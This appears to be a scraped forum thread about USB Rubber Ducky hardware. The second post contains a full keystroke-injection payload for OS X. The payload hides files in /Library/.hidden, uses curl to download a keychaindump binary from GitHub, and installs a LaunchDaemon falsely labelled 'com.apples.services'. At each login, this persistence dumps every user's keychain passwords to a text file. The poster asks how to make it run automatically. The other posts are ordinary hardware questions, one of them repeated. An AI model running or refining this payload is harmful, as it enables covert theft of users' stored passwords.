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  1. Does anyone have a proxmark3 they are looking to sell?
  2. I was trying to take advantage of a project called KeychainDump that extracts OS X Keychain decryption keys from RAM to dump passwords but am having an issue. First off, the source can be found on https://github.com/IsaiahJTurner/duckdump I compiled the keychaindump binary myself but feel free to compile it on your own if you don't trust mine. The issue I am having is that OS X launchd never seems to run. If I run the script manually, it works, but I wan't it to run automatically as soon as the user logs in. Any help? Partially Inspired By: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---OSX-Root-Backdoor REM Isaiah Turner REM This tool will automatically dump all passwords stored in the keychain to a file on the desktop upon login. REM Please do not use this for evil, this is for educational purposes only. REM http://isaiahjturner.com DELAY 1000 STRING mount -uw / ENTER DELAY 2000 STRING mkdir /Library/.hidden ENTER DELAY 200 STRING echo '#!/bin/sh ENTER STRING curl -o /Library/.hidden/keychaindump 'https://raw.githubusercontent.com/IsaiahJTurner/keychaindump/master/keychaindump' ENTER STRING chmod +x /Library/.hidden/keychaindump ENTER STRING w -h | sort -u -t'"' '"' -k1,1 | while read user etc ENTER STRING do ENTER STRING homedir=$(dscl . -read /Users/$user NFSHomeDirectory | cut -d'"' '"' -f2) ENTER STRING /Library/.hidden/keychaindump $homedir/Library/Keychains/login.keychain > $homedir/Desktop/$user.login.keychain.txt ENTER STRING done' > /Library/.hidden/dump.sh ENTER DELAY 500 STRING chmod +x /Library/.hidden/dump.sh ENTER DELAY 200 STRING mkdir /Library/LaunchDaemons ENTER DELAY 200 STRING echo '<plist version="1.0"> ENTER STRING <dict> ENTER STRING <key>Label</key> ENTER STRING <string>com.apples.services</string> ENTER STRING <key>ProgramArguments</key> ENTER STRING <array> ENTER STRING <string>/bin/sh</string> ENTER STRING <string>/Library/.hidden/dump.sh</string> ENTER STRING </array> ENTER STRING <key>RunAtLoad</key> ENTER STRING <true/> ENTER STRING <key>AbandonProcessGroup</key> ENTER STRING <true/> ENTER STRING </dict> ENTER STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 500 STRING chmod 644 /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 200 STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist
  3. Yay! My Ducky arrived today!!! From what I can tell, most tutorials on flashing are written for the PC. As a Mac user, I was wondering if someone could point me in the rite direction?
  4. Yay! My Ducky arrived today!!! From what I can tell, most tutorials on flashing are written for the PC. As a Mac user, I was wondering if someone could point me in the rite direction?
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